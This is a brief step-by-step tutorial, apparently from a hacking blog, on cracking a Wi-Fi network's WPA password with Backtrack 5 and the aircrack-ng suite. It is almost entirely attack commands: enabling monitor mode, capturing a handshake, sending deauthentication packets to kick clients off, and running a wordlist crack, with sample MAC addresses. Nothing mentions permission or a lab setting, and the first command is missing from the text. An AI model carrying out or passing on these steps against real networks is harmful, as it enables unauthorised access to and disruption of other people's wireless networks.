1.Before Starting The Tutorial Make Sure You have 3 Things.
2.Backtrack 5 r3
3.Wifi Device
4.A Good Word List.
Now Starting. Start Backtrack 5.
1. Fire up Terminal and type first Command
This Command Will show the interface.
2. Now type the 2nd CommandAirmon-ng start wlan0This Command will start the monitor mode on the interface
3. Now type the 3rd CommandAirodump-ng mon0This Command will Start Scanning All Wifi Networks
4. Now Type The forth CommandAirodump-ng -c ( channel ) -w ( file name to save captured packets ) –bssid (bssid of network) mon0This Command Will scan network until you get a handshake file
For example: airodump-ng –w capture-packages –bssid 00:22:75:E7:6E:0B –c 11 mon0
5. Now Type the 5th commandAireplay-ng –deauth 64 -a (bssid) mon0This command will send deauth request. If the data is not generated you can increase request Numbers
aireplay-ng –deauth 1 –a 00:22:75:E7:6E:0B –c F0:CB:A1:2A:FB:62 mon0
6. Now Type The 6th command.NOTE: World-list should be in “/ROOT/PEN TEST/PASSWORDS/WORLD-LIST/”Aircrack-ng (file name) -w( drag world-list file )
This command will crack the password.
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